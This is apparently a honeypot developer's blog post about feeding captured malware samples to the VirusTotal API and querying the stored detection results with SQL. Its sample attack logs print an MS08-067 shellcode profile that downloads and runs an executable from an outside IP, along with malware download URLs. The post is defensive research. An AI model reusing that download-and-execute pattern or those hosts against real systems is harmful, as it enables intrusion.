I've been messing with virustotal some time ago, and at that point of time you had to scape the html output. Things have changed, virustotal offers a free http api to interface with their services, all you have to do is sign up and get the api key which is hidden deep in the web2.0 interface.
Using the api, you have get_file_report, scan_file and make_comment.
If we receive a new file, we have to check if the file is known to virustotal yet, which is done by calling get_file_report, the json encoded resultset will indicate if the file was known, for known files, we are done now.
If the file was unknown, we submit the file using scan_file, once the file is uploaded, we wait 60 seconds and post a rather useless but self advertising comment this file was gathered by the dionaea honeypot.
Then, we have to wait for the file to be analyzed by virustotal by polling the files result with get_file_report.
While the api imposes a limit of max 20 calls in 5 minutes, the initial version of the code dionaea used to submit files to virustotal simply ignored this limit, and it ignored the result returned by virustotal.
As the information returned by virustotal is rather interesting, I decided to allow dionaea to store the information and associate it with the other data gathered for the attacks, namely, the data returned by virustotal is stored in the sqlite database now.
And, as I wanted virustotal to process all my backlog of files dionaea gathered so far, I wanted it to be able to honor the 20/5 api call limit virustotal imposes.
So, dionaea's virustotal code maintains a cache of outstanding virustotal operations for all files lacking virustotal informations. This cache is a sqlite3 database, and we process one item per 20 seconds from this cache.
logsql stores the final information in the logsql.sqlite database and you can use readlogsqltree to get a readable representation of the information received.
2010-10-07 02:50:23
connection 483162 smbd tcp accept 93.218.68.29:445 <- 194.170.206.5:16240 (483162 None)
dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 6cb71c2c-9812-4540-0100-000000000000
dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 24 (CreateServiceA ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
profile: []
offer: smb://194.170.206.5/csrss.exe
download: 12fb7332920a7797c2d02df29b57c640 smb://194.170.206.5
virustotal 2010-08-30 14:06:38 39/43 (91%) http://www.virustotal.com/file-scan/report.html?id=c7247d162cf720c07979946afd01b6b1907db9a4be6916a3a6be268993638fee-1283169998
names 'Downloader' 'Downloader.Generic' 'Email-Worm.Win32.Atak' 'Email-Worm.Win32.Atak!IK' 'Generic Worm' 'Heuristic.BehavesLike.Win32.Proxy.H' 'Medium Risk Malware' 'PSW.Agent.AHCN' 'TR/Agent.mtv' 'Troj/Brambul-A' 'TrojWare.Win32.Agent.mtv0' 'Trojan' 'Trojan-Spy.Win32.Agent.bazy' 'Trojan-Spy.Win32.Agent.bbel' 'Trojan-Spy/W32.Agent.57344.KT' 'Trojan.Win32.Generic!BT' 'Trojan.Win32.Generic.51EEB62C' 'Trojan/Spy.Agent.bbel' 'Trojan/Win32.Agent.gen' 'Trojan:Win32/Brambul.A' 'TrojanSpy.Agent.QBIR' 'TrojanSpy.Agent.bbel' 'TrojanSpy.Agent.mza' 'W32/Bagz.gen@MM' 'W32/EMailWorm.DUT' 'W32/Trojan2.KEXN' 'WORM_MYDOOM.DA' 'Win-Trojan/Agent.57344.XY' 'Win32.HLLW.Bumble' 'Win32.TRAgent.Mtv' 'Win32/Pepex.E' 'Win32/Tnega.WW' 'Win32:Rootkit-gen' 'Worm.Generic.241160'
You get the detection rate, the link for the virustotal report and the names the different av companies assigned to the threat.
As CME was abandoned, the only way to get a reasonable number of names is gathering files with low detection rates:
2010-10-06 19:16:07
connection 482728 smbd tcp accept 93.218.68.209:445 <- 93.81.169.153:3132 (482728 None)
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.171/j.exe', '83.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['83.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
offer: http://208.53.183.171/j.exe
download: c9e5edea5f4f1b2c7ea6a3d15a9450f7 http://208.53.183.171/j.exe
virustotal 2010-10-05 20:49:20 0/43 (0%) http://www.virustotal.com/file-scan/report.html?id=3819100edd956200aa65ce6dceb3fd07414f180e624fdb1979bb13c8b3019d0c-1286304560
names
In this case there was no detection, but if you click on the link virustotal links a more recent analysis of the file, where 14 of 42 scanners detected the threat.
Given the data is available in a sqlite database, it is rather easy to query …
SELECT
COUNT(virustotalscan_result), virustotalscan_result
FROM
virustotalscans
NATURAL JOIN virustotalscans
WHERE
virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY
virustotalscan_result
ORDER BY
COUNT(virustotalscan_result) DESC;
Get all names for Conficker - if one scanner claims it is Conficker, we assume all other names are aliases for Conficker.
| count | name |
| 8900 | Win32.Worm.Downadup.Gen |
| 6894 | W32/Conficker!Generic |
| 5797 | WORM_DOWNAD.AD |
| 3870 | Net-Worm.Win32.Kido.ih |
| 3721 | Mal/Conficker-A |
| 3666 | W32/Conficker.worm.gen.a |
| 3605 | W32/Conficker.C.worm |
| 3423 | W32.Downadup.B |
| 3388 | Win32:Confi |
SELECT
COUNT(DISTINCT virustotalscan_result), virustotalscan_scanner
FROM
virustotalscans
NATURAL JOIN virustotalscans
WHERE
virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY
virustotalscan_scanner
ORDER BY
COUNT(DISTINCT virustotalscan_result) DESC;
Signature quality, how many signatures do scanners have for Conficker.
| count | scanner |
| 1445 | nProtect |
| 592 | McAfee-GW-Edition |
| 558 | Jiangmin |
| 463 | McAfee |
| 456 | McAfee+Artemis |
| 330 | ViRobot |
| 270 | Rising |
| 260 | ClamAV |
SELECT
download_md5_hash,
COUNT(DISTINCT dcerpcserviceop_vuln) AS vulncnt,
MAX(dcerpcserviceop_vuln) AS maxvuln,
COUNT(download_md5_hash) AS numdls
FROM
virustotalscans
NATURAL JOIN virustotals
JOIN downloads ON(download_md5_hash = virustotal_md5_hash)
NATURAL JOIN connections
NATURAL JOIN dcerpcrequests
JOIN dcerpcservices ON(dcerpcrequest_uuid = dcerpcservice_uuid)
JOIN dcerpcserviceops ON (dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum)
WHERE
virustotalscan_scanner = 'Kaspersky'
AND virustotalscan_result IS NULL
AND dcerpcserviceop_vuln IS NOT NULL
AND dcerpcserviceop_vuln != ''
GROUP BY
download_md5_hash
ORDER BY
COUNT(download_md5_hash) DESC;
Query all samples gatherd via smb bugs and the vulnerability used which are not detected by Kaspersky.
| md5sum | number of vulns | example vuln | downloads |
| 3498bcd9d0f5f94575f7b4e78d1b337d | 1 | MS08-67 | 6 |
| 3ae47280a0008814efef0e9f236f1800 | 1 | MS08-67 | 4 |
| 7c5b64d771e0f205e3884c3fcf361a8b | 1 | MS08-67 | 4 |
| 3de40bad3d1409376ad77077159707bb | 1 | MS08-67 | 3 |
| 2b40f52664bda0565f6c2c6016c50cad | 1 | MS08-67 | 2 |
| 53979f1820886f089a75689ed15ecf6e | 1 | MS08-67 | 2 |
As this is quite new code, and dionaea only queries new files, you won't get any virustotal results for all the files you gathered so far by default. By default means, this can be changed.
We can simply store all files you received so far in the already mentioned virustotal cache file, and dionaea will process all your backlog.
Due to the api limit of 20 requests in 5 minutes, where dionaea does one request all 20 seconds, this will take some time.
#!/opt/dionaea/bin/python3
import sqlite3
lsqld = sqlite3.connect('/opt/dionaea/var/dionaea/logsql.sqlite')
lsqlc = lsqld.cursor()
r = lsqlc.execute("""SELECT
download_md5_hash
FROM
downloads
LEFT OUTER JOIN virustotals ON (virustotal_md5_hash = download_md5_hash)
WHERE
virustotal_md5_hash IS NULL
GROUP BY
download_md5_hash
ORDER BY
COUNT(*) DESC;""")
vtd = sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite')
vtc = vtd.cursor()
for i in r:
vtc.execute("INSERT INTO backlogfiles (status,md5_hash,path,timestamp) VALUES ('new',?,?,strftime('%s','now'))", (
i[0], '/opt/dionaea/var/dionaea/binaries/' + i[0]) )
vtd.commit()
You can check the status from time to time:
sqlite3 /opt/dionaea/var/dionaea/vtcache.sqlite
SELECT count(*) FROM backlogfiles;
get number of pending files
SELECT * FROM backlogfiles WHERE STATUS != 'new';
get files which are in processing
As dionaea currently does not deal with virustotal server or connection errors gracefully, sometimes files get stuck, you can revive them using:
UPDATE backlogfiles SET STATUS = 'comment' WHERE STATUS = 'comment-';
UPDATE backlogfiles SET STATUS = 'new' WHERE STATUS = 'new-';
UPDATE backlogfiles SET STATUS = 'query' WHERE STATUS = 'query-';
And for some files, virustotal does not work at all, in my case I was unable to submit some files, d320d802a407da14a77e809329de31cc for example.
[…] 2010:10:07:virustotal_api [carnivore news] […]